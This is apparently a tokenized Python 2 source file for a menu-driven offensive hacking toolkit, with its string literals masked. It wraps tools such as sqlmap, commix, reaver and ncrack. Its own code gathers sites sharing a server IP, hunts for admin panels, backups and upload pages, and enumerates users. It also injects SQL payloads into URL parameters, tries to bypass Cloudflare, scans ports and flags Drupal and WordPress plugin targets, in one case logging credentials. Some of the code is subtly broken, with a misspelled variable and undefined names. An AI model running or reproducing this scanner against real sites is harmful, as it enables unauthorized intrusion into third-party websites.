<EOL> print '<STR_LIT:\n>' <EOL> print '<STR_LIT>' , len ( gravityforms ) , '<STR_LIT>' <EOL> def shellnoob ( ) : <EOL> print """<STR_LIT>""" <EOL> cshell = raw_input ( "<STR_LIT>" ) <EOL> if cshell in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> if cshell in no : <EOL> exp ( ) <EOL> elif cshell == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def info ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choice2 = raw_input ( "<STR_LIT>" ) <EOL> if choice2 == "<STR_LIT:1>" : <EOL> os . system ( '<STR_LIT>' ) ; nmap ( ) <EOL> if choice2 == "<STR_LIT:2>" : <EOL> clearScr ( ) ; setoolkit ( ) <EOL> if choice2 == "<STR_LIT:3>" : <EOL> clearScr ( ) ; ports ( ) <EOL> if choice2 == "<STR_LIT:4>" : <EOL> clearScr ( ) ; h2ip ( ) <EOL> elif choice2 == "<STR_LIT>" : <EOL> clearScr ( ) ; menu ( ) <EOL> elif choice2 == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def priv8 ( ) : <EOL> tnn ( ) <EOL> def passwd ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choice3 = raw_input ( "<STR_LIT>" ) <EOL> if choice3 == "<STR_LIT:1>" : <EOL> clearScr ( ) ; cupp ( ) <EOL> elif choice3 == "<STR_LIT:2>" : <EOL> clearScr ( ) ; ncrack ( ) <EOL> elif choice3 == "<STR_LIT>" : <EOL> clearScr ( ) ; menu ( ) <EOL> elif choice3 == "<STR_LIT>" : <EOL> menu ( ) <EOL> elif choice3 == "<STR_LIT:3>" : <EOL> fb ( ) <EOL> else : <EOL> menu ( ) <EOL> def wire ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choice4 = raw_input ( "<STR_LIT>" ) <EOL> if choice4 == "<STR_LIT:1>" : <EOL> clearScr ( ) ; reaver ( ) <EOL> if choice4 == "<STR_LIT:2>" : <EOL> clearScr ( ) ; pixiewps ( ) <EOL> elif choice4 == "<STR_LIT>" : <EOL> menu ( ) <EOL> elif choice4 == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def exp ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choice5 = raw_input ( "<STR_LIT>" ) <EOL> if choice5 == "<STR_LIT:2>" : <EOL> clearScr ( ) ; sqlmap ( ) <EOL> if choice5 == "<STR_LIT:1>" : <EOL> os . system ( '<STR_LIT>' ) ; jboss ( ) <EOL> if choice5 == "<STR_LIT:3>" : <EOL> clearScr ( ) ; shellnoob ( ) <EOL> if choice5 == "<STR_LIT:4>" : <EOL> os . system ( "<STR_LIT>" ) ; commix ( ) <EOL> elif choice5 == "<STR_LIT>" : <EOL> menu ( ) <EOL> elif choice5 == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def snif ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choice6 = raw_input ( "<STR_LIT>" ) <EOL> if choice6 == "<STR_LIT:1>" : <EOL> clearScr ( ) ; setoolkit ( ) <EOL> if choice6 == "<STR_LIT:2>" : <EOL> clearScr ( ) ; ssls ( ) <EOL> if choice6 == "<STR_LIT>" : <EOL> clearScr ( ) ; menu ( ) <EOL> elif choice6 == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def win ( ) : <EOL> clearScr ( ) <EOL> print ( "<STR_LIT>" ) <EOL> sys . exit ( ) ; <EOL> def OS ( ) : <EOL> print ( <EOL> """<STR_LIT>""" ) <EOL> system = raw_input ( "<STR_LIT>" ) <EOL> if system == "<STR_LIT:2>" : <EOL> menu ( ) <EOL> elif system == "<STR_LIT:1>" : <EOL> root ( ) <EOL> elif system == "<STR_LIT:3>" : <EOL> win ( ) <EOL> elif system == "<STR_LIT>" : <EOL> OS ( ) <EOL> else : <EOL> sys . exit ( ) ; <EOL> def root ( ) : <EOL> if os . getuid ( ) != <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> exit ( ) <EOL> else : <EOL> menu ( ) <EOL> menuu = """<STR_LIT>""" <EOL> def unique ( seq ) : <EOL> """<STR_LIT>""" <EOL> seen = set ( ) <EOL> return [ seen . add ( x ) or x for x in seq if x not in seen ] <EOL> def clearScr ( ) : <EOL> """<STR_LIT>""" <EOL> if system ( ) == '<STR_LIT>' : <EOL> os . system ( '<STR_LIT>' ) <EOL> if system ( ) == '<STR_LIT>' : <EOL> os . system ( '<STR_LIT>' ) <EOL> class TNscan : <EOL> def __init__ ( self , serverip ) : <EOL> self . serverip = serverip <EOL> self . getSites ( False ) <EOL> print menuu <EOL> while True : <EOL> choice = raw_input ( '<STR_LIT>' ) <EOL> if choice == '<STR_LIT:1>' : <EOL> self . getSites ( True ) <EOL> elif choice == '<STR_LIT:2>' : <EOL> self . getJoomla ( ) <EOL> elif choice == '<STR_LIT:3>' : <EOL> self . getWordpress ( ) <EOL> elif choice == '<STR_LIT:4>' : <EOL> self . findPanels ( ) <EOL> elif choice == '<STR_LIT:5>' : <EOL> self . findZip ( ) <EOL> elif choice == '<STR_LIT>' : <EOL> self . findUp ( ) <EOL> elif choice == '<STR_LIT>' : <EOL> self . getUsers ( ) <EOL> elif choice == '<STR_LIT>' : <EOL> self . grabSqli ( ) <EOL> elif choice == '<STR_LIT>' : <EOL> ran = raw_input ( '<STR_LIT>' ) <EOL> self . portScanner ( <NUM_LIT:1> , ran ) <EOL> elif choice == '<STR_LIT>' : <EOL> self . portScanner ( <NUM_LIT:2> , None ) <EOL> elif choice == '<STR_LIT>' : <EOL> self . getServerBanner ( ) <EOL> elif choice == '<STR_LIT>' : <EOL> self . cloudflareBypasser ( ) <EOL> elif choice == '<STR_LIT>' : <EOL> menu ( ) <EOL> con = raw_input ( '<STR_LIT>' ) <EOL> if con [ <NUM_LIT:0> ] . upper ( ) == '<STR_LIT:N>' : <EOL> exit ( ) <EOL> else : <EOL> clearScr ( ) <EOL> print menuu <EOL> def getSites ( self , a ) : <EOL> """<STR_LIT>""" <EOL> lista = [ ] <EOL> page = <NUM_LIT:1> <EOL> while page <= <NUM_LIT> : <EOL> try : <EOL> bing = "<STR_LIT>" + self . serverip + "<STR_LIT>" + str ( page ) <EOL> openbing = urllib2 . urlopen ( bing ) <EOL> readbing = openbing . read ( ) <EOL> findwebs = re . findall ( '<STR_LIT>' , readbing ) <EOL> for i in range ( len ( findwebs ) ) : <EOL> allnoclean = findwebs [ i ] <EOL> findall1 = re . findall ( '<STR_LIT>' , allnoclean ) <EOL> for idx , item in enumerate ( findall1 ) : <EOL> if '<STR_LIT>' not in item : <EOL> findall1 [ idx ] = '<STR_LIT>' + item + '<STR_LIT:/>' <EOL> else : <EOL> findall1 [ idx ] = '<STR_LIT>' + item + '<STR_LIT:/>' <EOL> lista . extend ( findall1 ) <EOL> page += <NUM_LIT:50> <EOL> except urllib2 . URLError : <EOL> pass <EOL> self . sites = unique ( lista ) <EOL> if a : <EOL> clearScr ( ) <EOL> print '<STR_LIT>' , len ( lista ) , '<STR_LIT>' <EOL> for site in self . sites : <EOL> print site <EOL> def getWordpress ( self ) : <EOL> """<STR_LIT>""" <EOL> lista = [ ] <EOL> page = <NUM_LIT:1> <EOL> while page <= <NUM_LIT> : <EOL> try : <EOL> bing = "<STR_LIT>" + self . serverip + "<STR_LIT>" + str ( page ) <EOL> openbing = urllib2 . urlopen ( bing ) <EOL> readbing = openbing . read ( ) <EOL> findwebs = re . findall ( '<STR_LIT>' , readbing ) <EOL> for i in range ( len ( findwebs ) ) : <EOL> wpnoclean = findwebs [ i ] <EOL> findwp = re . findall ( '<STR_LIT>' , wpnoclean ) <EOL> lista . extend ( findwp ) <EOL> page += <NUM_LIT:50> <EOL> except : <EOL> pass <EOL> lista = unique ( lista ) <EOL> clearScr ( ) <EOL> print '<STR_LIT>' , len ( lista ) , '<STR_LIT>' <EOL> for site in lista : <EOL> print site <EOL> def getJoomla ( self ) : <EOL> """<STR_LIT>""" <EOL> lista = [ ] <EOL> page = <NUM_LIT:1> <EOL> while page <= <NUM_LIT> : <EOL> bing = "<STR_LIT>" + self . serverip + "<STR_LIT>" + str ( page ) <EOL> openbing = urllib2 . urlopen ( bing ) <EOL> readbing = openbing . read ( ) <EOL> findwebs = re . findall ( '<STR_LIT>' , readbing ) <EOL> for i in range ( len ( findwebs ) ) : <EOL> jmnoclean = findwebs [ i ] <EOL> findjm = re . findall ( '<STR_LIT>' , jmnoclean ) <EOL> lista . extend ( findjm ) <EOL> page += <NUM_LIT:50> <EOL> lista = unique ( lista ) <EOL> clearScr ( ) <EOL> print '<STR_LIT>' , len ( lista ) , '<STR_LIT>' <EOL> for site in lista : <EOL> print site <EOL> def findPanels ( self ) : <EOL> """<STR_LIT>""" <EOL> print "<STR_LIT>" <EOL> adminList = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> clearScr ( ) <EOL> for site in self . sites : <EOL> for admin in adminList : <EOL> try : <EOL> if urllib . urlopen ( site + admin ) . getcode ( ) == <NUM_LIT:200> : <EOL> print "<STR_LIT>" , site + admin <EOL> except IOError : <EOL> pass <EOL> def findZip ( self ) : <EOL> """<STR_LIT>""" <EOL> zipList = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> clearScr ( ) <EOL> print "<STR_LIT>" <EOL> for site in self . sites : <EOL> for zip1 in zipList : <EOL> try : <EOL> if urllib . urlopen ( site + zip1 ) . getcode ( ) == <NUM_LIT:200> : <EOL> print "<STR_LIT>" , site + zip1 <EOL> except IOError : <EOL> pass <EOL> def findUp ( self ) : <EOL> """<STR_LIT>""" <EOL> upList = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> clearScr ( ) <EOL> print "<STR_LIT>" <EOL> for site in self . sites : <EOL> for up in upList : <EOL> try : <EOL> if ( urllib . urlopen ( site + up ) . getcode ( ) == <NUM_LIT:200> ) : <EOL> html = urllib . urlopen ( site + up ) . readlines ( ) <EOL> for line in html : <EOL> if re . findall ( '<STR_LIT>' , line ) : <EOL> print "<STR_LIT>" , site + up <EOL> except IOError : <EOL> pass <EOL> def getUsers ( self ) : <EOL> """<STR_LIT>""" <EOL> clearScr ( ) <EOL> print "<STR_LIT>" <EOL> userslist = [ ] <EOL> for site1 in self . sites : <EOL> try : <EOL> site = site1 <EOL> site = site . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> site = site . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> site = site . replace ( '<STR_LIT:.>' , '<STR_LIT>' ) <EOL> if '<STR_LIT:->' in site : <EOL> site = site . replace ( '<STR_LIT:->' , '<STR_LIT>' ) <EOL> site = site . replace ( '<STR_LIT:/>' , '<STR_LIT>' ) <EOL> while len ( site ) > <NUM_LIT:2> : <EOL> resp = urllib2 . urlopen ( site1 + '<STR_LIT>' % site ) . read ( ) <EOL> if '<STR_LIT>' not in resp . lower ( ) : <EOL> print '<STR_LIT>' , site <EOL> userslist . append ( site ) <EOL> break <EOL> else : <EOL> print site <EOL> site = site [ : - <NUM_LIT:1> ] <EOL> except : <EOL> pass <EOL> clearScr ( ) <EOL> for user in userslist : <EOL> print user <EOL> def cloudflareBypasser ( self ) : <EOL> """<STR_LIT>""" <EOL> clearScr ( ) <EOL> print "<STR_LIT>" <EOL> subdoms = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for site in self . sites : <EOL> site . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> site . replace ( '<STR_LIT:/>' , '<STR_LIT>' ) <EOL> try : <EOL> ip = socket . gethostbyname ( site ) <EOL> except socket . error : <EOL> pass <EOL> for sub in subdoms : <EOL> doo = sub + '<STR_LIT:.>' + site <EOL> print '<STR_LIT>' , doo <EOL> try : <EOL> ddd = socket . gethostbyname ( doo ) <EOL> if ddd != ip : <EOL> print '<STR_LIT>' , ddd <EOL> break <EOL> except socket . error : <EOL> pass <EOL> def getServerBanner ( self ) : <EOL> """<STR_LIT>""" <EOL> clearScr ( ) <EOL> try : <EOL> s = '<STR_LIT>' + self . serverip <EOL> httpresponse = urllib . urlopen ( s ) <EOL> print '<STR_LIT>' , httpresponse . headers . getheader ( '<STR_LIT>' ) <EOL> except : <EOL> pass <EOL> def grabSqli ( self ) : <EOL> """<STR_LIT>""" <EOL> page = <NUM_LIT:1> <EOL> lista = [ ] <EOL> while page <= <NUM_LIT> : <EOL> try : <EOL> bing = "<STR_LIT>" + self . serverip + "<STR_LIT>" + str ( page ) <EOL> openbing = urllib2 . urlopen ( bing ) <EOL> readbing = openbing . read ( ) <EOL> findwebs = re . findall ( '<STR_LIT>' , readbing ) <EOL> for i in range ( len ( findwebs ) ) : <EOL> x = findwebs [ i ] <EOL> lista . append ( x ) <EOL> except : <EOL> pass <EOL> page += <NUM_LIT:50> <EOL> lista = unique ( lista ) <EOL> self . checkSqli ( lista ) <EOL> def checkSqli ( self , s ) : <EOL> """<STR_LIT>""" <EOL> clearScr ( ) <EOL> print "<STR_LIT>" <EOL> payloads = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> check = re . compile ( "<STR_LIT>" , re . I ) <EOL> for url in s : <EOL> try : <EOL> for param in url . split ( '<STR_LIT:?>' ) [ <NUM_LIT:1> ] . split ( '<STR_LIT:&>' ) : <EOL> for payload in payloads : <EOL> power = url . replace ( param , param + payload . strip ( ) ) <EOL> html = urllib2 . urlopen ( power ) . readlines ( ) <EOL> for line in html : <EOL> checker = re . findall ( check , line ) <EOL> if len ( checker ) != <NUM_LIT:0> : <EOL> print '<STR_LIT>' , power <EOL> except : <EOL> pass <EOL> def portScanner ( self , mode , ran ) : <EOL> """<STR_LIT>""" <EOL> clearScr ( ) <EOL> print "<STR_LIT>" <EOL> def do_it ( ip , port ) : <EOL> sock = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> sock = sock . connect_ex ( ( ip , port ) ) <EOL> if sock == <NUM_LIT:0> : <EOL> print "<STR_LIT>" % port <EOL> if mode == <NUM_LIT:1> : <EOL> a = ran . split ( '<STR_LIT:->' ) <EOL> start = int ( a [ <NUM_LIT:0> ] ) <EOL> end = int ( a [ <NUM_LIT:1> ] ) <EOL> for i in range ( start , end ) : <EOL> do_it ( self . serverip , i ) <EOL> elif mode == <NUM_LIT:2> : <EOL> for port in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> do_it ( self . serverip , port ) <EOL> minu = '''<STR_LIT>''' <EOL> def drupal ( ) : <EOL> '''<STR_LIT>''' <EOL> ip = raw_input ( '<STR_LIT>' ) <EOL> page = <NUM_LIT:1> <EOL> while page <= <NUM_LIT:50> : <EOL> url = "<STR_LIT>" + ip + "<STR_LIT>" + ip + "<STR_LIT>" + str ( page ) <EOL> req = urllib2 . Request ( url ) <EOL> opreq = urllib2 . urlopen ( req ) . read ( ) <EOL> findurl = re . findall ( '<STR_LIT>' , opreq ) <EOL> page += <NUM_LIT:1> <EOL> for url in findurl : <EOL> try : <EOL> urlpa = urlparse ( url ) <EOL> site = urlpa . netloc <EOL> print "<STR_LIT>" + site <EOL> resp = urllib2 . urlopen ( '<STR_LIT>' + site + '<STR_LIT>' ) <EOL> read = resp . read ( ) <EOL> if "<STR_LIT>" in read : <EOL> print "<STR_LIT>" + site <EOL> print "<STR_LIT>" <EOL> a = open ( '<STR_LIT>' , '<STR_LIT:a>' ) <EOL> a . write ( site + '<STR_LIT:\n>' ) <EOL> a . write ( "<STR_LIT>" + user + "<STR_LIT>" + pwd + "<STR_LIT:\n>" ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> except Exception as ex : <EOL> print ex <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> def getdrupal ( ) : <EOL> ip = raw_input ( '<STR_LIT>' ) <EOL> page = <NUM_LIT:1> <EOL> sites = list ( ) <EOL> while page <= <NUM_LIT:50> : <EOL> url = "<STR_LIT>" + ip + "<STR_LIT>" + str ( page ) <EOL> req = urllib2 . Request ( url ) <EOL> opreq = urllib2 . urlopen ( req ) . read ( ) <EOL> findurl = re . findall ( '<STR_LIT>' , opreq ) <EOL> page += <NUM_LIT:1> <EOL> for url in findurl : <EOL> split = urlparse ( url ) <EOL> site = split . netloc <EOL> if site not in sites : <EOL> print site <EOL> sites . append ( site ) <EOL> def drupallist ( ) : <EOL> listop = raw_input ( "<STR_LIT>" ) <EOL> fileopen = open ( listop , '<STR_LIT:r>' ) <EOL> content = fileopen . readlines ( ) <EOL> for i in content : <EOL> url = i . strip ( ) <EOL> try : <EOL> openurl = urllib2 . urlopen ( '<STR_LIT>' + url + '<STR_LIT>' ) <EOL> readcontent = openurl . read ( ) <EOL> if "<STR_LIT>" in readcontent : <EOL> print "<STR_LIT>" + url <EOL> print "<STR_LIT>" <EOL> save = open ( '<STR_LIT>' , '<STR_LIT:a>' ) <EOL> save . write ( url + "<STR_LIT:\n>" + "<STR_LIT>" ) <EOL> else : <EOL> print i + "<STR_LIT>" <EOL> except Exception as ex : <EOL> print ex <EOL> def maine ( ) : <EOL> print minu <EOL> choose = raw_input ( "<STR_LIT>" ) <EOL> while True : <EOL> if choose == "<STR_LIT:1>" : <EOL> drupal ( ) <EOL> if choose == "<STR_LIT:2>" : <EOL> getdrupal ( ) <EOL> if choose == "<STR_LIT:3>" : <EOL> drupallist ( ) <EOL> if choose == "<STR_LIT:4>" : <EOL> about ( ) <EOL> if choose == "<STR_LIT>" : <EOL> menu ( ) <EOL> con = raw_input ( '<STR_LIT>' ) <EOL> if con [ <NUM_LIT:0> ] . upper ( ) == '<STR_LIT:N>' : <EOL> exit ( ) <EOL> if con [ <NUM_LIT:0> ] . upper ( ) == '<STR_LIT:Y>' : <EOL> maine ( ) <EOL> def unique ( seq ) : <EOL> seen = set ( ) <EOL> return [ seen . add ( x ) or x for x in seq if x not in seen ] <EOL> def bing_all_grabber ( s ) : <EOL> lista = [ ] <EOL> page = <NUM_LIT:1> <EOL> while page <= <NUM_LIT> : <EOL> try : <EOL> bing = "<STR_LIT>" + s + "<STR_LIT>" + str ( page ) <EOL> openbing = urllib2 . urlopen ( bing ) <EOL> readbing = openbing . read ( ) <EOL> findwebs = re . findall ( '<STR_LIT>' , readbing ) <EOL> for i in range ( len ( findwebs ) ) : <EOL> allnoclean = findwebs [ i ] <EOL> findall1 = re . findall ( '<STR_LIT>' , allnoclean ) <EOL> for idx , item in enumerate ( findall1 ) : <EOL> if '<STR_LIT>' not in item : <EOL> findall1 [ idx ] = '<STR_LIT>' + item + '<STR_LIT:/>' <EOL> else : <EOL> findall1 [ idx ] = '<STR_LIT>' + item + '<STR_LIT:/>' <EOL> lista . extend ( findall1 ) <EOL> page += <NUM_LIT:50> <EOL> except urllib2 . URLError : <EOL> pass <EOL> final = unique ( lista ) <EOL> return final <EOL> def check_wordpress ( sites ) : <EOL> wp = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib2 . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT:200> : <EOL> wp . append ( site ) <EOL> except : <EOL> pass <EOL> return wp <EOL> def check_joomla ( sites ) : <EOL> joomla = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib2 . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT:200> : <EOL> joomla . append ( site ) <EOL> except : <EOL> pass <EOL> return joomla <EOL> def wppjmla ( ) : <EOL> ipp = raw_input ( '<STR_LIT>' ) <EOL> sites = bing_all_grabber ( str ( ipp ) ) <EOL> wordpress = check_wordpress ( sites ) <EOL> joomla = check_joomla ( sites ) <EOL> for ss in wordpress : <EOL> print ss <EOL> print '<STR_LIT>' , len ( wordpress ) , '<STR_LIT>' <EOL> print '<STR_LIT:->' * <NUM_LIT:30> + '<STR_LIT:\n>' <EOL> for ss in joomla : <EOL> print ss <EOL> print '<STR_LIT>' , len ( joomla ) , '<STR_LIT>' <EOL> print '<STR_LIT:\n>' <EOL> class tnn ( ) : <EOL> def __init__ ( self ) : <EOL> clearScr ( ) <EOL> aaa = raw_input ( "<STR_LIT>" ) <EOL> TNscan ( aaa ) <EOL> class bcolors : <EOL> HEADER = '<STR_LIT>' <EOL> OKBLUE = '<STR_LIT>' <EOL> OKGREEN = '<STR_LIT>' <EOL> WARNING = '<STR_LIT>' <EOL> FAIL = '<STR_LIT>' <EOL> ENDC = '<STR_LIT>' <EOL> CYAN = '<STR_LIT>' <EOL> class colors ( ) : <EOL> PURPLE = '<STR_LIT>' <EOL> CYAN = '<STR_LIT>' <EOL> DARKCYAN = '<STR_LIT>' <EOL> BLUE = '<STR_LIT>' <EOL> GREEN = '<STR_LIT>' <EOL> YELLOW = '<STR_LIT>' <EOL> RED = '<STR_LIT>' <EOL> BOLD = '<STR_LIT>' <EOL> ENDC = '<STR_LIT>' <EOL> def grabsqli ( ip ) : <EOL> try : <EOL> print bcolors . OKBLUE + "<STR_LIT>" <EOL> print '<STR_LIT:\n>' <EOL> page = <NUM_LIT:1> <EOL> while page <= <NUM_LIT> : <EOL> bing = "<STR_LIT>" + ip + "<STR_LIT>" + str ( page ) <EOL> openbing = urllib2 . urlopen ( bing ) <EOL> readbing = openbing . read ( ) <EOL> findwebs = re . findall ( '<STR_LIT>' , readbing ) <EOL> sites = findwebs <EOL> for i in sites : <EOL> try : <EOL> response = urllib2 . urlopen ( i ) . read ( ) <EOL> checksqli ( i ) <EOL> except urllib2 . HTTPError , e : <EOL> str ( sites ) . strip ( i ) <EOL> page = page + <NUM_LIT:10> <EOL> except : <EOL> pass <EOL> def checksqli ( sqli ) : <EOL> responsetwo = urllib2 . urlopen ( sqli ) . read ( ) <EOL> find = re . findall ( '<STR_LIT>' , responsetwo ) <EOL> if find : <EOL> print ( "<STR_LIT>" + sqli ) <EOL> def sqlscan ( ) : <EOL> ip = raw_input ( '<STR_LIT>' ) <EOL> grabsqli ( ip ) <EOL> def unique ( seq ) : <EOL> seen = set ( ) <EOL> return [ seen . add ( x ) or x for x in seq if x not in seen ] <EOL> def bing_all_grabber ( s ) : <EOL> lista = [ ] <EOL> page = <NUM_LIT:1> <EOL> while page <= <NUM_LIT> : <EOL> try : <EOL> bing = "<STR_LIT>" + s + "<STR_LIT>" + str ( page ) <EOL> openbing = urllib2 . urlopen ( bing ) <EOL> readbing = openbing . read ( ) <EOL> findwebs = re . findall ( '<STR_LIT>' , readbing ) <EOL> for i in range ( len ( findwebs ) ) : <EOL> allnoclean = findwebs [ i ] <EOL> findall1 = re . findall ( '<STR_LIT>' , allnoclean ) <EOL> for idx , item in enumerate ( findall1 ) : <EOL> if '<STR_LIT>' not in item : <EOL> findall1 [ idx ] = '<STR_LIT>' + item + '<STR_LIT:/>' <EOL> else : <EOL> findall1 [ idx ] = '<STR_LIT>' + item + '<STR_LIT:/>' <EOL> lista . extend ( findall1 ) <EOL> page += <NUM_LIT:50> <EOL> except urllib2 . URLError : <EOL> pass <EOL> final = unique ( lista ) <EOL> return final <EOL> def check_wordpress ( sites ) : <EOL> wp = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib2 . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT:200> : <EOL> wp . append ( site ) <EOL> except : <EOL> pass <EOL> return wp <EOL> def check_wpstorethemeremotefileupload ( sites ) : <EOL> wpstorethemeremotefileupload = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib2 . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT:200> : <EOL> wpstorethemeremotefileupload . append ( site ) <EOL> except : <EOL> pass <EOL> return wpstorethemeremotefileupload <EOL> def check_wpcontactcreativeform ( sites ) : <EOL> wpcontactcreativeform = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib2 . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT:200> : <EOL> wpcontactcreativeform . append ( site ) <EOL> except : <EOL> pass <EOL> return wpcontactcreativeform <EOL> def check_wplazyseoplugin ( sites ) : <EOL> wplazyseoplugin = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib2 . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT:200> : <EOL> wplazyseoplugin . append ( site ) <EOL> except : <EOL> pass <EOL> return wplazyseoplugin <EOL> def check_wpeasyupload ( sites ) : <EOL> wpeasyupload = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib2 . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT:200> : <EOL> wpeasyupload . append ( site ) <EOL> except : <EOL> pass <EOL> return wpeasyupload <EOL> def check_wpsymposium ( sites ) : <EOL> wpsymposium = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib2 . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT:200> : <EOL> wpsycmium . append ( site ) <EOL> except : <EOL> pass <EOL> return wpsymposium <EOL> def wpminiscanner ( ) : <EOL> ip = raw_input ( '<STR_LIT>' ) <EOL> sites = bing_all_grabber ( str ( ip ) ) <EOL> wordpress = check_wordpress ( sites ) <EOL> wpstorethemeremotefileupload = check_wpstorethemeremotefileupload ( sites ) <EOL> wpcontactcreativeform = check_wpcontactcreativeform ( sites ) <EOL> wplazyseoplugin = check_wplazyseoplugin ( sites ) <EOL> wpeasyupload = check_wpeasyupload ( sites ) <EOL> wpsymposium = check_wpsymposium ( sites ) <EOL> for ss in wordpress : <EOL> print ss <EOL> print '<STR_LIT>' , len ( wordpress ) , '<STR_LIT>' <EOL> print '<STR_LIT:->' * <NUM_LIT:30> + '<STR_LIT:\n>' <EOL> for ss in wpstorethemeremotefileupload : <EOL> print ss <EOL> print '<STR_LIT>' , len ( wpstorethemeremotefileupload ) , '<STR_LIT>' <EOL> print '<STR_LIT:->' * <NUM_LIT:30> + '<STR_LIT:\n>' <EOL> for ss in wpcontactcreativeform : <EOL> print ss <EOL> print '<STR_LIT>' , len ( wpcontactcreativeform ) , '<STR_LIT>' <EOL> print '<STR_LIT:->' * <NUM_LIT:30> + '<STR_LIT:\n>' <EOL> for ss in wplazyseoplugin : <EOL> print ss <EOL> print '<STR_LIT>' , len ( wplazyseoplugin ) , '<STR_LIT>' <EOL> print '<STR_LIT:->' * <NUM_LIT:30> + '<STR_LIT:\n>' <EOL> for ss in wpeasyupload : <EOL> print ss <EOL> print '<STR_LIT>' , len ( wpeasyupload ) , '<STR_LIT>' <EOL> print '<STR_LIT:->' * <NUM_LIT:30> + '<STR_LIT:\n>' <EOL> for ss in wpsymposium : <EOL> print ss <EOL> print '<STR_LIT>' , len ( wpsymposium ) , '<STR_LIT>' <EOL> print '<STR_LIT:\n>' <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> menu ( ) </s>
